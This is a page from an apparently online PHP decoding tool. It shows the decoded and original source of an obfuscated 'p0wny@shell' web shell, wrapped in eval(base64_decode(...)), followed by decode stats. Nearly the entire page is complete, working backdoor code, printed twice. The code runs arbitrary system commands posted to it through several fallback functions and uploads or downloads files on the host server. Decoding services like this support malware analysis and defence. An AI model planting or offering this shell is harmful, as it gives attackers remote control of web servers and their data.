Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode('CiBnb3RvIEJsZDZ2OyBGeEYwUzogZnVuY3Rpb24gYWxsRnVuY3Rpb25FeGlzdCgk..

Decoded Output download


 goto Bld6v; FxF0S: function allFunctionExist($list = array()) { foreach ($list as $entry) { if (!function_exists($entry)) { return false; } } return true; } goto p3rOd; o4_sl: ?>
<!doctypehtml><html><head><meta charset="UTF-8"><title>p0wny@shell:~#</title><meta content="width=device-width,initial-scale=1"name="viewport"><style>body,html{margin:0;padding:0;background:#333;color:#eee;font-family:monospace;width:100vw;height:100vh;overflow:hidden}::-webkit-scrollbar-track{border-radius:8px;background-color:#353535}::-webkit-scrollbar{width:8px;height:8px}::-webkit-scrollbar-thumb{border-radius:8px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#bcbcbc}#shell{background:#222;box-shadow:0 0 5px rgba(0,0,0,.3);font-size:10pt;display:flex;flex-direction:column;align-items:stretch;max-width:calc(100vw - 2 * var(--shell-margin));max-height:calc(100vh - 2 * var(--shell-margin));resize:both;overflow:hidden;width:100%;height:100%;margin:var(--shell-margin) auto}#shell-content{overflow:auto;padding:5px;white-space:pre-wrap;flex-grow:1}#shell-logo{font-weight:700;color:#ff4180;text-align:center}:root{--shell-margin:25px}@media (min-width:1200px){:root{--shell-margin:50px!important}}@media (max-width:991px),(max-height:600px){#shell-logo{font-size:6px;margin:-25px 0}:root{--shell-margin:0!important}#shell{resize:none}}@media (max-width:767px){#shell-input{flex-direction:column}}@media (max-width:320px){#shell-logo{font-size:5px}}.shell-prompt{font-weight:700;color:#75df0b}.shell-prompt>span{color:#1bc9e7}#shell-input{display:flex;box-shadow:0 -1px 0 rgba(0,0,0,.3);border-top:rgba(255,255,255,.05) solid 1px;padding:10px 0}#shell-input>label{flex-grow:0;display:block;padding:0 5px;height:30px;line-height:30px}#shell-input #shell-cmd{height:30px;line-height:30px;border:none;background:0 0;color:#eee;font-family:monospace;font-size:10pt;width:100%;align-self:center;box-sizing:border-box}#shell-input div{flex-grow:1;align-items:stretch}#shell-input input{outline:0}</style><script>var SHELL_CONFIG=<?php  goto kMxRc; mqIS_: function featureDownload($filePath) { $file = @file_get_contents($filePath); if ($file === FALSE) { return array("\x73\164\x64\157\x75\x74" => base64_encode("\x46\x69\x6c\145\x20\x6e\157\164\x20\146\x6f\x75\x6e\x64\40\57\x20\156\157\x20\x72\x65\141\144\40\x70\145\x72\x6d\151\x73\x73\x69\157\156\x2e"), "\143\x77\144" => base64_encode(getcwd())); } else { return array("\156\x61\x6d\x65" => base64_encode(basename($filePath)), "\x66\151\x6c\145" => base64_encode($file)); } } goto Re0fJ; sMarD: function expandPath($path) { if (preg_match("\43\136\x28\176\x5b\x61\55\172\x41\55\132\x30\55\x39\x5f\56\55\135\x2a\51\50\x2f\x2e\x2a\51\x3f\44\43", $path, $match)) { exec("\x65\143\x68\x6f\40{$match["\x31"]}", $stdout); return $stdout[0] . $match[2]; } return $path; } goto FxF0S; Re0fJ: function featureUpload($path, $file, $cwd) { chdir($cwd); $f = @fopen($path, "\167\x62"); if ($f === FALSE) { return array("\x73\164\144\157\x75\164" => base64_encode("\111\156\x76\141\x6c\151\x64\x20\x70\141\x74\150\x20\x2f\x20\x6e\157\x20\167\x72\x69\x74\145\x20\x70\x65\162\x6d\151\x73\x73\151\157\x6e\56"), "\143\x77\x64" => base64_encode(getcwd())); } else { fwrite($f, base64_decode($file)); fclose($f); return array("\163\164\x64\x6f\165\164" => base64_encode("\x44\x6f\156\x65\56"), "\x63\167\144" => base64_encode(getcwd())); } } goto WbByD; WbByD: function initShellConfig() { global $SHELL_CONFIG; if (isRunningWindows()) { $username = getenv("\125\123\x45\122\x4e\101\115\105"); if ($username !== false) { $SHELL_CONFIG["\165\163\145\162\x6e\x61\155\145"] = $username; } } else { $pwuid = posix_getpwuid(posix_geteuid()); if ($pwuid !== false) { $SHELL_CONFIG["\165\x73\x65\x72\x6e\x61\x6d\145"] = $pwuid["\x6e\x61\155\145"]; } } $hostname = gethostname(); if ($hostname !== false) { $SHELL_CONFIG["\150\x6f\x73\x74\x6e\141\x6d\145"] = $hostname; } } goto tDfTf; H84Jl: function featureShell($cmd, $cwd) { $stdout = ''; if (preg_match("\x2f\136\134\163\x2a\143\144\x5c\163\52\x28\x32\76\x26\x31\x29\77\x24\57", $cmd)) { chdir(expandPath("\176")); } elseif (preg_match("\x2f\x5e\x5c\163\52\x63\x64\x5c\163\x2b\x28\56\53\51\x5c\x73\52\x28\x32\76\46\61\51\77\x24\57", $cmd)) { chdir($cwd); preg_match("\57\136\134\163\52\x63\x64\x5c\x73\x2b\50\133\x5e\x5c\163\135\53\51\134\163\x2a\x28\62\76\46\x31\x29\x3f\44\57", $cmd, $match); chdir(expandPath($match[1])); } elseif (preg_match("\x2f\136\x5c\x73\52\144\157\167\156\x6c\x6f\141\144\134\163\x2b\x5b\x5e\x5c\163\135\53\134\163\x2a\50\62\x3e\46\x31\51\x3f\x24\57", $cmd)) { chdir($cwd); preg_match("\x2f\x5e\134\163\52\144\x6f\x77\x6e\154\157\x61\144\x5c\163\x2b\x28\x5b\136\134\163\135\53\51\x5c\x73\x2a\x28\62\76\46\x31\x29\77\44\57", $cmd, $match); return featureDownload($match[1]); } else { chdir($cwd); $stdout = executeCommand($cmd); } return array("\163\x74\144\x6f\165\x74" => base64_encode($stdout), "\143\167\144" => base64_encode(getcwd())); } goto WCgIa; Bld6v: $SHELL_CONFIG = array("\165\x73\145\x72\x6e\x61\x6d\145" => "\x70\x30\x77\156\171", "\150\x6f\163\164\156\141\x6d\x65" => "\163\x68\145\154\154"); goto sMarD; OeuI4: function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == "\x63\x6d\x64") { $cmd = "\x63\157\x6d\160\147\x65\x6e\40\x2d\x63\40{$fileName}"; } else { $cmd = "\x63\157\155\160\x67\x65\156\x20\x2d\146\x20{$fileName}"; } $cmd = "\57\142\x69\156\x2f\142\x61\x73\150\x20\x2d\143\x20\42{$cmd}\x22"; $files = explode("\xa", shell_exec($cmd)); foreach ($files as &$filename) { $filename = base64_encode($filename); } return array("\146\x69\154\145\x73" => $files); } goto mqIS_; cjWD8: function isRunningWindows() { return stripos(PHP_OS, "\127\111\116") === 0; } goto H84Jl; kMxRc: echo json_encode($SHELL_CONFIG); goto WPqI0; p3rOd: function executeCommand($cmd) { $output = ''; if (function_exists("\x65\x78\x65\143")) { exec($cmd, $output); $output = implode("\12", $output); } else { if (function_exists("\163\150\x65\x6c\x6c\x5f\x65\x78\x65\143")) { $output = shell_exec($cmd); } else { if (allFunctionExist(array("\x73\171\x73\x74\x65\155", "\157\142\x5f\163\164\141\x72\x74", "\x6f\x62\137\147\x65\164\137\143\157\156\164\x65\x6e\x74\163", "\x6f\x62\x5f\145\156\x64\137\143\154\145\x61\156"))) { ob_start(); system($cmd); $output = ob_get_contents(); ob_end_clean(); } else { if (allFunctionExist(array("\x70\141\x73\x73\x74\x68\162\x75", "\x6f\142\x5f\163\x74\141\162\164", "\x6f\x62\x5f\x67\145\x74\137\x63\157\156\164\x65\x6e\x74\163", "\x6f\142\137\x65\x6e\x64\x5f\x63\154\x65\x61\156"))) { ob_start(); passthru($cmd); $output = ob_get_contents(); ob_end_clean(); } else { if (allFunctionExist(array("\160\157\x70\x65\x6e", "\x66\x65\157\x66", "\146\x72\x65\x61\x64", "\x70\143\x6c\157\x73\x65"))) { $handle = popen($cmd, "\162"); while (!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); } else { if (allFunctionExist(array("\x70\162\157\x63\x5f\x6f\160\x65\156", "\x73\x74\162\145\x61\155\x5f\x67\145\164\137\143\157\x6e\164\x65\x6e\164\163", "\160\x72\157\143\137\x63\154\157\163\x65"))) { $handle = proc_open($cmd, array(0 => array("\160\151\160\145", "\x72"), 1 => array("\x70\151\160\145", "\x77")), $pipes); $output = stream_get_contents($pipes[1]); proc_close($handle); } } } } } } return $output; } goto cjWD8; WCgIa: function featurePwd() { return array("\x63\x77\x64" => base64_encode(getcwd())); } goto OeuI4; tDfTf: if (isset($_GET["\x66\145\141\164\x75\162\145"])) { $response = NULL; switch ($_GET["\x66\x65\141\x74\165\x72\145"]) { case "\163\150\x65\x6c\x6c": $cmd = $_POST["\143\x6d\x64"]; if (!preg_match("\x2f\62\76\x2f", $cmd)) { $cmd .= "\40\x32\x3e\x26\x31"; } $response = featureShell($cmd, $_POST["\x63\x77\144"]); break; case "\x70\x77\144": $response = featurePwd(); break; case "\150\x69\156\164": $response = featureHint($_POST["\146\x69\x6c\x65\x6e\141\155\145"], $_POST["\143\167\144"], $_POST["\164\x79\x70\x65"]); break; case "\x75\160\x6c\157\x61\x64": $response = featureUpload($_POST["\x70\141\164\150"], $_POST["\146\151\x6c\145"], $_POST["\x63\167\x64"]); } header("\103\157\156\x74\x65\156\164\55\124\171\160\145\72\x20\x61\160\160\154\151\x63\141\164\151\x6f\156\x2f\x6a\x73\x6f\x6e"); echo json_encode($response); die; } else { initShellConfig(); } goto o4_sl; WPqI0: ?>
,CWD=null,commandHistory=[],historyPosition=0,eShellCmdInput=null,eShellContent=null;function _insertCommand(e){eShellContent.innerHTML+="\n\n",eShellContent.innerHTML+='<span class="shell-prompt">'+genPrompt(CWD)+"</span> ",eShellContent.innerHTML+=escapeHtml(e),eShellContent.innerHTML+="\n",eShellContent.scrollTop=eShellContent.scrollHeight}function _insertStdout(e){eShellContent.innerHTML+=escapeHtml(e),eShellContent.scrollTop=eShellContent.scrollHeight}function _defer(e){setTimeout(e,0)}function featureShell(e){_insertCommand(e),/^\s*upload\s+[^\s]+\s*$/.test(e)?featureUpload(e.match(/^\s*upload\s+([^\s]+)\s*$/)[1]):/^\s*clear\s*$/.test(e)?eShellContent.innerHTML="":makeRequest("?feature=shell",{cmd:e,cwd:CWD},function(e){e.hasOwnProperty("file")?featureDownload(atob(e.name),e.file):(_insertStdout(atob(e.stdout)),updateCwd(atob(e.cwd)))})}function featureHint(){if(0!==eShellCmdInput.value.trim().length){var e=eShellCmdInput.value.split(" "),n=1===e.length?"cmd":"file";makeRequest("?feature=hint",{filename:"cmd"==n?e[0]:e[e.length-1],cwd:CWD,type:n},function(e){if(!(e.files.length<=1))if(e.files=e.files.map(function(e){return atob(e)}),2===e.files.length)if("cmd"==n)eShellCmdInput.value=e.files[0];else{var t=eShellCmdInput.value;eShellCmdInput.value=t.replace(/([^\s]*)$/,e.files[0])}else _insertCommand(eShellCmdInput.value),_insertStdout(e.files.join("\n"))})}}function featureDownload(e,t){var n=document.createElement("a");n.setAttribute("href","data:application/octet-stream;base64,"+t),n.setAttribute("download",e),n.style.display="none",document.body.appendChild(n),n.click(),document.body.removeChild(n),_insertStdout("Done.")}function featureUpload(t){var e=document.createElement("input");e.setAttribute("type","file"),e.style.display="none",document.body.appendChild(e),e.addEventListener("change",function(){getBase64(e.files[0]).then(function(e){makeRequest("?feature=upload",{path:t,file:e,cwd:CWD},function(e){_insertStdout(atob(e.stdout)),updateCwd(atob(e.cwd))})},function(){_insertStdout("An unknown client-side error occurred.")})}),e.click(),document.body.removeChild(e)}function getBase64(o,e){return new Promise(function(e,t){var n=new FileReader;n.onload=function(){e(n.result.match(/base64,(.*)$/)[1])},n.onerror=t,n.readAsDataURL(o)})}function genPrompt(e){var t=e=e||"~";if(3<e.split("/").length){var n=e.split("/");t="/"+n[n.length-2]+"/"+n[n.length-1]}return SHELL_CONFIG.username+"@"+SHELL_CONFIG.hostname+':<span title="'+e+'">'+t+"</span>#"}function updateCwd(e){if(e)return CWD=e,void _updatePrompt();makeRequest("?feature=pwd",{},function(e){CWD=atob(e.cwd),_updatePrompt()})}function escapeHtml(e){return e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function _updatePrompt(){document.getElementById("shell-prompt").innerHTML=genPrompt(CWD)}function _onShellCmdKeyDown(e){switch(e.key){case"Enter":featureShell(eShellCmdInput.value),insertToHistory(eShellCmdInput.value),eShellCmdInput.value="";break;case"ArrowUp":0<historyPosition&&(historyPosition--,eShellCmdInput.blur(),eShellCmdInput.value=commandHistory[historyPosition],_defer(function(){eShellCmdInput.focus()}));break;case"ArrowDown":if(historyPosition>=commandHistory.length)break;++historyPosition===commandHistory.length?eShellCmdInput.value="":(eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"Tab":e.preventDefault(),featureHint()}}function insertToHistory(e){commandHistory.push(e),historyPosition=commandHistory.length}function makeRequest(e,n,t){var o=new XMLHttpRequest;o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),o.onreadystatechange=function(){if(4===o.readyState&&200===o.status)try{var e=JSON.parse(o.responseText);t(e)}catch(e){alert("Error while parsing response: "+e)}},o.send(function(){var e=[];for(var t in n)n.hasOwnProperty(t)&&e.push(encodeURIComponent(t)+"="+encodeURIComponent(n[t]));return e.join("&")}())}document.onclick=function(e){e=e||window.event;var t=window.getSelection();"SELECT"!==(e.target||e.srcElement).tagName&&(t.toString()||eShellCmdInput.focus())},window.onload=function(){eShellCmdInput=document.getElementById("shell-cmd"),eShellContent=document.getElementById("shell-content"),updateCwd(),eShellCmdInput.focus()}</script></head><body><div id="shell"><pre id="shell-content">
                <div id="shell-logo">
        ___                         ____      _          _ _        _  _   <span></span>
 _ __  / _ \__      ___ __  _   _  / __ \ ___| |__   ___| | |_ /\/|| || |_ <span></span>
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_  ..  _|<span></span>
| |_) | |_| |\ V  V /| | | | |_| | | (_| \__ \ | | |  __/ | |_   |_      _|<span></span>
| .__/ \___/  \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_)    |_||_|  <span></span>
|_|                         |___/  \____/                                  <span></span>
                </div>
            </pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input id="shell-cmd"name="cmd"onkeydown="_onShellCmdKeyDown(event)"></div></div></div></body></htm

Did this file decode correctly?

Original Code

<?php eval(base64_decode('
 goto Bld6v; FxF0S: function allFunctionExist($list = array()) { foreach ($list as $entry) { if (!function_exists($entry)) { return false; } } return true; } goto p3rOd; o4_sl: ?>
<!doctypehtml><html><head><meta charset="UTF-8"><title>p0wny@shell:~#</title><meta content="width=device-width,initial-scale=1"name="viewport"><style>body,html{margin:0;padding:0;background:#333;color:#eee;font-family:monospace;width:100vw;height:100vh;overflow:hidden}::-webkit-scrollbar-track{border-radius:8px;background-color:#353535}::-webkit-scrollbar{width:8px;height:8px}::-webkit-scrollbar-thumb{border-radius:8px;-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);background-color:#bcbcbc}#shell{background:#222;box-shadow:0 0 5px rgba(0,0,0,.3);font-size:10pt;display:flex;flex-direction:column;align-items:stretch;max-width:calc(100vw - 2 * var(--shell-margin));max-height:calc(100vh - 2 * var(--shell-margin));resize:both;overflow:hidden;width:100%;height:100%;margin:var(--shell-margin) auto}#shell-content{overflow:auto;padding:5px;white-space:pre-wrap;flex-grow:1}#shell-logo{font-weight:700;color:#ff4180;text-align:center}:root{--shell-margin:25px}@media (min-width:1200px){:root{--shell-margin:50px!important}}@media (max-width:991px),(max-height:600px){#shell-logo{font-size:6px;margin:-25px 0}:root{--shell-margin:0!important}#shell{resize:none}}@media (max-width:767px){#shell-input{flex-direction:column}}@media (max-width:320px){#shell-logo{font-size:5px}}.shell-prompt{font-weight:700;color:#75df0b}.shell-prompt>span{color:#1bc9e7}#shell-input{display:flex;box-shadow:0 -1px 0 rgba(0,0,0,.3);border-top:rgba(255,255,255,.05) solid 1px;padding:10px 0}#shell-input>label{flex-grow:0;display:block;padding:0 5px;height:30px;line-height:30px}#shell-input #shell-cmd{height:30px;line-height:30px;border:none;background:0 0;color:#eee;font-family:monospace;font-size:10pt;width:100%;align-self:center;box-sizing:border-box}#shell-input div{flex-grow:1;align-items:stretch}#shell-input input{outline:0}</style><script>var SHELL_CONFIG=<?php  goto kMxRc; mqIS_: function featureDownload($filePath) { $file = @file_get_contents($filePath); if ($file === FALSE) { return array("\x73\164\x64\157\x75\x74" => base64_encode("\x46\x69\x6c\145\x20\x6e\157\164\x20\146\x6f\x75\x6e\x64\40\57\x20\156\157\x20\x72\x65\141\144\40\x70\145\x72\x6d\151\x73\x73\x69\157\156\x2e"), "\143\x77\144" => base64_encode(getcwd())); } else { return array("\156\x61\x6d\x65" => base64_encode(basename($filePath)), "\x66\151\x6c\145" => base64_encode($file)); } } goto Re0fJ; sMarD: function expandPath($path) { if (preg_match("\43\136\x28\176\x5b\x61\55\172\x41\55\132\x30\55\x39\x5f\56\55\135\x2a\51\50\x2f\x2e\x2a\51\x3f\44\43", $path, $match)) { exec("\x65\143\x68\x6f\40{$match["\x31"]}", $stdout); return $stdout[0] . $match[2]; } return $path; } goto FxF0S; Re0fJ: function featureUpload($path, $file, $cwd) { chdir($cwd); $f = @fopen($path, "\167\x62"); if ($f === FALSE) { return array("\x73\164\144\157\x75\164" => base64_encode("\111\156\x76\141\x6c\151\x64\x20\x70\141\x74\150\x20\x2f\x20\x6e\157\x20\167\x72\x69\x74\145\x20\x70\x65\162\x6d\151\x73\x73\151\157\x6e\56"), "\143\x77\x64" => base64_encode(getcwd())); } else { fwrite($f, base64_decode($file)); fclose($f); return array("\163\164\x64\x6f\165\164" => base64_encode("\x44\x6f\156\x65\56"), "\x63\167\144" => base64_encode(getcwd())); } } goto WbByD; WbByD: function initShellConfig() { global $SHELL_CONFIG; if (isRunningWindows()) { $username = getenv("\125\123\x45\122\x4e\101\115\105"); if ($username !== false) { $SHELL_CONFIG["\165\163\145\162\x6e\x61\155\145"] = $username; } } else { $pwuid = posix_getpwuid(posix_geteuid()); if ($pwuid !== false) { $SHELL_CONFIG["\165\x73\x65\x72\x6e\x61\x6d\145"] = $pwuid["\x6e\x61\155\145"]; } } $hostname = gethostname(); if ($hostname !== false) { $SHELL_CONFIG["\150\x6f\x73\x74\x6e\141\x6d\145"] = $hostname; } } goto tDfTf; H84Jl: function featureShell($cmd, $cwd) { $stdout = ''; if (preg_match("\x2f\136\134\163\x2a\143\144\x5c\163\52\x28\x32\76\x26\x31\x29\77\x24\57", $cmd)) { chdir(expandPath("\176")); } elseif (preg_match("\x2f\x5e\x5c\163\52\x63\x64\x5c\163\x2b\x28\56\53\51\x5c\x73\52\x28\x32\76\46\61\51\77\x24\57", $cmd)) { chdir($cwd); preg_match("\57\136\134\163\52\x63\x64\x5c\x73\x2b\50\133\x5e\x5c\163\135\53\51\134\163\x2a\x28\62\76\46\x31\x29\x3f\44\57", $cmd, $match); chdir(expandPath($match[1])); } elseif (preg_match("\x2f\136\x5c\x73\52\144\157\167\156\x6c\x6f\141\144\134\163\x2b\x5b\x5e\x5c\163\135\53\134\163\x2a\50\62\x3e\46\x31\51\x3f\x24\57", $cmd)) { chdir($cwd); preg_match("\x2f\x5e\134\163\52\144\x6f\x77\x6e\154\157\x61\144\x5c\163\x2b\x28\x5b\136\134\163\135\53\51\x5c\x73\x2a\x28\62\76\46\x31\x29\77\44\57", $cmd, $match); return featureDownload($match[1]); } else { chdir($cwd); $stdout = executeCommand($cmd); } return array("\163\x74\144\x6f\165\x74" => base64_encode($stdout), "\143\167\144" => base64_encode(getcwd())); } goto WCgIa; Bld6v: $SHELL_CONFIG = array("\165\x73\145\x72\x6e\x61\x6d\145" => "\x70\x30\x77\156\171", "\150\x6f\163\164\156\141\x6d\x65" => "\163\x68\145\154\154"); goto sMarD; OeuI4: function featureHint($fileName, $cwd, $type) { chdir($cwd); if ($type == "\x63\x6d\x64") { $cmd = "\x63\157\x6d\160\147\x65\x6e\40\x2d\x63\40{$fileName}"; } else { $cmd = "\x63\157\155\160\x67\x65\156\x20\x2d\146\x20{$fileName}"; } $cmd = "\57\142\x69\156\x2f\142\x61\x73\150\x20\x2d\143\x20\42{$cmd}\x22"; $files = explode("\xa", shell_exec($cmd)); foreach ($files as &$filename) { $filename = base64_encode($filename); } return array("\146\x69\154\145\x73" => $files); } goto mqIS_; cjWD8: function isRunningWindows() { return stripos(PHP_OS, "\127\111\116") === 0; } goto H84Jl; kMxRc: echo json_encode($SHELL_CONFIG); goto WPqI0; p3rOd: function executeCommand($cmd) { $output = ''; if (function_exists("\x65\x78\x65\143")) { exec($cmd, $output); $output = implode("\12", $output); } else { if (function_exists("\163\150\x65\x6c\x6c\x5f\x65\x78\x65\143")) { $output = shell_exec($cmd); } else { if (allFunctionExist(array("\x73\171\x73\x74\x65\155", "\157\142\x5f\163\164\141\x72\x74", "\x6f\x62\137\147\x65\164\137\143\157\156\164\x65\x6e\x74\163", "\x6f\x62\x5f\145\156\x64\137\143\154\145\x61\156"))) { ob_start(); system($cmd); $output = ob_get_contents(); ob_end_clean(); } else { if (allFunctionExist(array("\x70\141\x73\x73\x74\x68\162\x75", "\x6f\142\x5f\163\x74\141\162\164", "\x6f\x62\x5f\x67\145\x74\137\x63\157\156\164\x65\x6e\x74\163", "\x6f\142\137\x65\x6e\x64\x5f\x63\154\x65\x61\156"))) { ob_start(); passthru($cmd); $output = ob_get_contents(); ob_end_clean(); } else { if (allFunctionExist(array("\160\157\x70\x65\x6e", "\x66\x65\157\x66", "\146\x72\x65\x61\x64", "\x70\143\x6c\157\x73\x65"))) { $handle = popen($cmd, "\162"); while (!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); } else { if (allFunctionExist(array("\x70\162\157\x63\x5f\x6f\160\x65\156", "\x73\x74\162\145\x61\155\x5f\x67\145\164\137\143\157\x6e\164\x65\x6e\164\163", "\160\x72\157\143\137\x63\154\157\163\x65"))) { $handle = proc_open($cmd, array(0 => array("\160\151\160\145", "\x72"), 1 => array("\x70\151\160\145", "\x77")), $pipes); $output = stream_get_contents($pipes[1]); proc_close($handle); } } } } } } return $output; } goto cjWD8; WCgIa: function featurePwd() { return array("\x63\x77\x64" => base64_encode(getcwd())); } goto OeuI4; tDfTf: if (isset($_GET["\x66\145\141\164\x75\162\145"])) { $response = NULL; switch ($_GET["\x66\x65\141\x74\165\x72\145"]) { case "\163\150\x65\x6c\x6c": $cmd = $_POST["\143\x6d\x64"]; if (!preg_match("\x2f\62\76\x2f", $cmd)) { $cmd .= "\40\x32\x3e\x26\x31"; } $response = featureShell($cmd, $_POST["\x63\x77\144"]); break; case "\x70\x77\144": $response = featurePwd(); break; case "\150\x69\156\164": $response = featureHint($_POST["\146\x69\x6c\x65\x6e\141\155\145"], $_POST["\143\167\144"], $_POST["\164\x79\x70\x65"]); break; case "\x75\160\x6c\157\x61\x64": $response = featureUpload($_POST["\x70\141\164\150"], $_POST["\146\151\x6c\145"], $_POST["\x63\167\x64"]); } header("\103\157\156\x74\x65\156\164\55\124\171\160\145\72\x20\x61\160\160\154\151\x63\141\164\151\x6f\156\x2f\x6a\x73\x6f\x6e"); echo json_encode($response); die; } else { initShellConfig(); } goto o4_sl; WPqI0: ?>
,CWD=null,commandHistory=[],historyPosition=0,eShellCmdInput=null,eShellContent=null;function _insertCommand(e){eShellContent.innerHTML+="\n\n",eShellContent.innerHTML+='<span class="shell-prompt">'+genPrompt(CWD)+"</span> ",eShellContent.innerHTML+=escapeHtml(e),eShellContent.innerHTML+="\n",eShellContent.scrollTop=eShellContent.scrollHeight}function _insertStdout(e){eShellContent.innerHTML+=escapeHtml(e),eShellContent.scrollTop=eShellContent.scrollHeight}function _defer(e){setTimeout(e,0)}function featureShell(e){_insertCommand(e),/^\s*upload\s+[^\s]+\s*$/.test(e)?featureUpload(e.match(/^\s*upload\s+([^\s]+)\s*$/)[1]):/^\s*clear\s*$/.test(e)?eShellContent.innerHTML="":makeRequest("?feature=shell",{cmd:e,cwd:CWD},function(e){e.hasOwnProperty("file")?featureDownload(atob(e.name),e.file):(_insertStdout(atob(e.stdout)),updateCwd(atob(e.cwd)))})}function featureHint(){if(0!==eShellCmdInput.value.trim().length){var e=eShellCmdInput.value.split(" "),n=1===e.length?"cmd":"file";makeRequest("?feature=hint",{filename:"cmd"==n?e[0]:e[e.length-1],cwd:CWD,type:n},function(e){if(!(e.files.length<=1))if(e.files=e.files.map(function(e){return atob(e)}),2===e.files.length)if("cmd"==n)eShellCmdInput.value=e.files[0];else{var t=eShellCmdInput.value;eShellCmdInput.value=t.replace(/([^\s]*)$/,e.files[0])}else _insertCommand(eShellCmdInput.value),_insertStdout(e.files.join("\n"))})}}function featureDownload(e,t){var n=document.createElement("a");n.setAttribute("href","data:application/octet-stream;base64,"+t),n.setAttribute("download",e),n.style.display="none",document.body.appendChild(n),n.click(),document.body.removeChild(n),_insertStdout("Done.")}function featureUpload(t){var e=document.createElement("input");e.setAttribute("type","file"),e.style.display="none",document.body.appendChild(e),e.addEventListener("change",function(){getBase64(e.files[0]).then(function(e){makeRequest("?feature=upload",{path:t,file:e,cwd:CWD},function(e){_insertStdout(atob(e.stdout)),updateCwd(atob(e.cwd))})},function(){_insertStdout("An unknown client-side error occurred.")})}),e.click(),document.body.removeChild(e)}function getBase64(o,e){return new Promise(function(e,t){var n=new FileReader;n.onload=function(){e(n.result.match(/base64,(.*)$/)[1])},n.onerror=t,n.readAsDataURL(o)})}function genPrompt(e){var t=e=e||"~";if(3<e.split("/").length){var n=e.split("/");t="…/"+n[n.length-2]+"/"+n[n.length-1]}return SHELL_CONFIG.username+"@"+SHELL_CONFIG.hostname+':<span title="'+e+'">'+t+"</span>#"}function updateCwd(e){if(e)return CWD=e,void _updatePrompt();makeRequest("?feature=pwd",{},function(e){CWD=atob(e.cwd),_updatePrompt()})}function escapeHtml(e){return e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function _updatePrompt(){document.getElementById("shell-prompt").innerHTML=genPrompt(CWD)}function _onShellCmdKeyDown(e){switch(e.key){case"Enter":featureShell(eShellCmdInput.value),insertToHistory(eShellCmdInput.value),eShellCmdInput.value="";break;case"ArrowUp":0<historyPosition&&(historyPosition--,eShellCmdInput.blur(),eShellCmdInput.value=commandHistory[historyPosition],_defer(function(){eShellCmdInput.focus()}));break;case"ArrowDown":if(historyPosition>=commandHistory.length)break;++historyPosition===commandHistory.length?eShellCmdInput.value="":(eShellCmdInput.blur(),eShellCmdInput.focus(),eShellCmdInput.value=commandHistory[historyPosition]);break;case"Tab":e.preventDefault(),featureHint()}}function insertToHistory(e){commandHistory.push(e),historyPosition=commandHistory.length}function makeRequest(e,n,t){var o=new XMLHttpRequest;o.open("POST",e,!0),o.setRequestHeader("Content-Type","application/x-www-form-urlencoded"),o.onreadystatechange=function(){if(4===o.readyState&&200===o.status)try{var e=JSON.parse(o.responseText);t(e)}catch(e){alert("Error while parsing response: "+e)}},o.send(function(){var e=[];for(var t in n)n.hasOwnProperty(t)&&e.push(encodeURIComponent(t)+"="+encodeURIComponent(n[t]));return e.join("&")}())}document.onclick=function(e){e=e||window.event;var t=window.getSelection();"SELECT"!==(e.target||e.srcElement).tagName&&(t.toString()||eShellCmdInput.focus())},window.onload=function(){eShellCmdInput=document.getElementById("shell-cmd"),eShellContent=document.getElementById("shell-content"),updateCwd(),eShellCmdInput.focus()}</script></head><body><div id="shell"><pre id="shell-content">
                <div id="shell-logo">
        ___                         ____      _          _ _        _  _   <span></span>
 _ __  / _ \__      ___ __  _   _  / __ \ ___| |__   ___| | |_ /\/|| || |_ <span></span>
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_  ..  _|<span></span>
| |_) | |_| |\ V  V /| | | | |_| | | (_| \__ \ | | |  __/ | |_   |_      _|<span></span>
| .__/ \___/  \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_)    |_||_|  <span></span>
|_|                         |___/  \____/                                  <span></span>
                </div>
            </pre><div id="shell-input"><label class="shell-prompt"for="shell-cmd"id="shell-prompt">???</label><div><input id="shell-cmd"name="cmd"onkeydown="_onShellCmdKeyDown(event)"></div></div></div></body></htm')); ?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 78059dd08fcb2036afb2ea5afde2bd87
Eval Count 1
Decode Time 82 ms